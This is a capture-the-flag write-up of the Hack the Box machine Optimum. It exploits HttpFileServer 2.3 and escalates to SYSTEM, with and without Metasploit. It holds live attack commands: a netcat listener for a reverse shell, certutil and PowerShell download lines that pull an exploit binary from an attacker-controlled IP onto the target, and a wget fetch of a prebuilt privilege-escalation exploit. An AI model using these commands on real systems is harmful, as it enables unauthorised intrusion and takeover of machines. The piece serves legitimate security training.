Hack the Box — Optimum

Published in

Offensive Walking

5 min readMar 7, 2023

With and Without Metasploit

Originally, I solved this box as part of the TCM Security Practical Ethical Hacking course with Metasploit but Heath, the instructor, did mention going back to solve it manually would be good practice. Whelp since the OSCP only lets one Metasploit use, I figure let me get into the practice of doing boxes without it. This box is also on the TJ Null List.

Recon

nmap -sC -sV -O -oA nmap/initial 10.10.10.8

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.8

nmap -sU -O -p- -oA nmap/udp 10.10.10.8

Enum

Google it…

Exploitable! We find https://www.exploit-db.com/exploits/39161

Exploitation With Metasploit

Find exploit for HttpFileServer 2.3

Configure the Options

There’s a Difference in Architecture between the box and our meterpreter session

But that doesn’t seem to affect our exploitation

Possible because Metasploit is auto-detecting the target

Privilege Escalation

I background the first meterpreter session and search for suggested post-breach exploits
The only option that needs to be configured here is the session
If sessions aren’t know you can just run show sessions

Once the suggester runs, I find what I’m really looking for which is a way to privilege escalate from the “Kostas” user to the system authority/root

We get system authority from the exploit

Manual Exploitation

In order to use the exploit we found from google searching we must find netcat and copy it into our working folder so we can serve it

locate nc.exe
cp /usr/share/windows-binaries/nc.exe ~/HTB/Optimum-10.10.10.8

Start the HTTP server

python -m SimpleHTTPServer 80

Start a listener

nc -nlvp 5555

Download the exploit we found: https://www.exploit-db.com/exploits/39161

“searchsploit -m” makes it easy to download exploits from exploit-db

Edit the exploit with our details

Run the exploit

python 39161.py 10.10.10.8 80

Acquire shell on listening port

Get user flag

Priv Esc

I used https://github.com/Glyph-Research/Windows-Exploit-Suggester.git which as its name implies suggests exploits based on system info

Initially, I ran this based on the readme instructions:

pip install xlrd --upgrade

To install the dependencies and update them BUT it actually broke the exploit.

I kept getting this error:

The fix was to downgrade to the older version I had before:

pip install xlrd==1.2.0

Now that the dependency issue has been fixed let me go back and explain the preparation for the above command.

In order to prepare the database and system info I run ``systeminfo`` command using the foothold of the Kostas user

Copy the output of ``systeminfo`` into sysinfo.txt

Then I run the following to create that database .xls file

./windows-exploit-suggester.py --update

Once those two pieces are created I can run the suggester:

From here all I have to do is download the executable that has already been compiled and since I still have my python server up and running I put this .exe in the same folder so I can grab it with Kostas

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41020.exe

Go back to my Kostas shell and use certutil

certutil.exe -urlcache -f http://10.10.14.37:80/41020.exe toasted.exe

This can also be accomplished with PowerShell

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.37:80/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

Once the exploit is run and the privileges have been escalated then getting the root flag is simple

Issues

Why was any of this possible? Both the foothold and privilege escalation were do to old, unpatched software. This box is old but has evergreen relevance because we are still facing issues in 2023 due to unpatched software and system components.